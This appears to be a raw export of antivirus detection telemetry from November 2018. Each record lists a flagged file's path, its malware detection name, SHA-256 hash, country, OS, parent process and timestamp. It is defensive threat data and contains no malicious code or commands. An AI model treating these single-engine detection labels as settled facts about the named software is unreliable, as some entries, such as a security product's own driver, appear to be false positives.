  Row(detection=Row(filename='ileabdr.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ileabdr.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0ac45a35416b98986da19fbfe9542725de6640c87b34ba80ba68873a7bdde409', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='idm universal web crack.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\IDM 6.25 build 25 Setup + Crack\\Crack\\IDM Universal Web Crack.exe', filesize=4864000, name='SPR/Crack.da9e47.#M1.#R1'), hash='da9e47927bc9937c31f9d1dc6a0e84f2372e392f1fad5da5617963e1572271a9', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:51:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000045', filepath='C:\\Windows\\Temp\\tmp00000169\\tmp00000045', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emsisoft Anti-Malware\\a2service.exe', parentsize=9449800, timestamp='2018-11-04T12:44:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='grotty.exe', filepath='C:\\altera\\91sp2\\quartus\\bin\\cygwin\\bin\\grotty.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='1e270e47555965a89f16c71287f37b1bdc3fb17a2c188069aad8ae5271d04a87', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T05:06:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-064943-3b34d651', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79756ac6\\AVSCAN-20181104-064846-326AEEDC\\AVSCAN-20181104-064943-3B34D651', filesize=2304000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='db80448da36bea375d9136f74a43f397082084f2125bbde680ef7df3d8f93aaa', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:50:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1273756b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1273756b.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d680', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d680', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T11:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135633-7429e53b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_11eda316\\AVSCAN-20181104-134711-32E1F176\\AVSCAN-20181104-135633-7429E53B', filesize=128000, name='DR/FakePic.Gen.#M1.#R1'), hash='d18de92fa4e8a0e23daa433b27756deb88674aadc7d8343ba2ca86bb32d50dbe', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:56:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2543273\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:15:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='w3l.exe', filepath='C:\\Program Files (x86)\\Warcraft III\\w3l.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4b779d8415e51bfe0fa64fe7515fb46db76bd2b7ca0d05411f4a46578e149c8b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RV5qOrXV50Op+if9.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T12:02:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:17:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='farmville.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Farmville.exe', filesize=384000, name='TR/AD.Bladabindi.buhyf.#M1.#R1'), hash='7ce21869bd92bd470080368379e7feab16cdac0ab78ffee55db5b7b88e6fec45', metadata=Row(cmdline='\\\\\\/\\\\\\/B \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\server.vbs\\\\\\"', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-04T12:50:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:33:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T13:56:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:16:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E4EED58AE227AB614046E0EE176D4E2CB147BEFFA11BCA7D2B97DC07B17D2AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wwbfyizj.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wwBFYiZj.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ulseejyl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\uLsEejYL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rade32a4.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\radE32A4.tmp.exe', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='researchdownload.exe', filepath='E:\\ADAVAN\\ResearchDownload_R2.10\\ResearchDownload_R2.10\\ResearchDownload.exe', filesize=2052000, name='W32/Ramnit.C.#M1.#R1'), hash='e58245c0f2770145584022562683304ad777e7eb1ec9d10829d322294e8f9cc1', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bfy4WiCtw0alTvys.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T08:08:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9a8423d813950488a6b7d026f605486c3c56eafb8555750e2b0274f808d4c356', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\9A8423D813950488A6B7D026F605486C3C56EAFB8555750E2B0274F808D4C356', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9a8423d813950488a6b7d026f605486c3c56eafb8555750e2b0274f808d4c356', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level2.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\LEVEL2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='fcacdeeecabea03fd1d2a9e924a85f96d0fed56f05c38b3f85fc7e84f222c600', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091707-2363c15f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-091707-2363C15F', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d91f930ab16122533e4b3af12556296ce2ee17585d0261932587be8ea6613ab4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T18:01:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blankandsecure.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\BlankAndSecure.exe", filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b21a555dc6987635294069f18160550d3d0312893c11fc226d5cbbcc6af44af3.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B21A555DC6987635294069F18160550D3D0312893C11FC226D5CBBCC6AF44AF3.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b21a555dc6987635294069f18160550d3d0312893c11fc226d5cbbcc6af44af3', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:48:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E4EED58AE227AB614046E0EE176D4E2CB147BEFFA11BCA7D2B97DC07B17D2AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:19:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xuj.exe', filepath='c:\\users\\X\\appdata\\roaming\\xuj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='836ac758-62a0-101d-1b86-63182be150ab.exe', filepath='h:\\{91ad8706-ca12-6444-bd7c-7c8c55aa6fa1}\\836ac758-62a0-101d-1b86-63182be150ab.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='fd82165081e2dafe1ef230016863b168255e2a72f8950dc42b66b13845258a1e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='C:\\PROGRAM FILES (X86)\\ASUS\\AI SUITE II\\MyLogo\\PEUPDATER\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='e927bbfdacb9a43c2840620ea4b74d3fc1ee0fbf1c74cd77f0e6a5ea81d2d2b8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:23:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110859-d0f0eda2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110859-D0F0EDA2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='360fsflt.sys', filepath='C:\\Program Files (x86)\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:53:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gear32pd.dll', filepath='C:\\Mitchell1\\OnDemand5\\gear32pd.dll', filesize=1280000, name='W32/Ramnit.CD.#M1.#R1'), hash='8ba6e83c3b59b632e5c259e7d9634c7fe82b62e76b15091af4b769d6636f586b', metadata=Row(cmdline='--engine=2 --session-id=+uXXFxHvvgU5kkaPKTDP\\\\\\/2fY1trof6L9l2Oo61y6 --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T20:36:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fd08a285fd310834179b5b9289e88b2d80bf763a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\fd08a285fd310834179b5b9289e88b2d80bf763a', filesize=2112000, name='Adware/DealPly.b35e9f.#M1.#R1'), hash='b35e9f4dea7b6f6bbc201d5500d8e69f851e08fc6b3790585e0aa7574c33c25d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:13:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T20:04:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nssA6F7.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T16:53:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dc1d054f-8bb2-4127-4032-de83852c2cd9.exe', filepath='H:\\{b3472fcc-224a-2bc9-a158-42418a120920}\\dc1d054f-8bb2-4127-4032-de83852c2cd9.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbcc46f6f225bfea3e6f0d3591dfedeb8e75cba2d30c044b348281947745bbe2', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:27:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='passmarkkeyboardtest.exe', filepath='E:\\HBCD\\Programs\\PassMarkKeyboardTest.exe', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-212723-7037edb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194636-33FC3CF2\\AVSCAN-20181101-212723-7037EDB1', filesize=64000, name='TR/Crypt.XPACK.Gen2.#M300.#R100420'), hash='c3f3ba19bedc965c2885dfb09a210f95b83ad33bfc4545cd8ec07062ae42adac', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='98275ef9c1609078649215c1584d4b0e0b55a28255d494237ab02ba0e4edaf82', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\98275EF9C1609078649215C1584D4B0E0B55A28255D494237AB02BA0E4EDAF82', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='98275ef9c1609078649215c1584d4b0e0b55a28255d494237ab02ba0e4edaf82', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:32:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauclts.exe', filepath='h:\\documents and settings\\X\\local settings\\temp\\8\\wuauclts.exe', filesize=448000, name='SPR/BitCoinMiner.P.#M1.#R1'), hash='d8cc0b480ee4ceebf16e4307b402febedafc538917b0cd25831200fb4c68eca5', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023984e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023984e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:43:39Z'), dt=datetime.date(2018, 11, 4)),
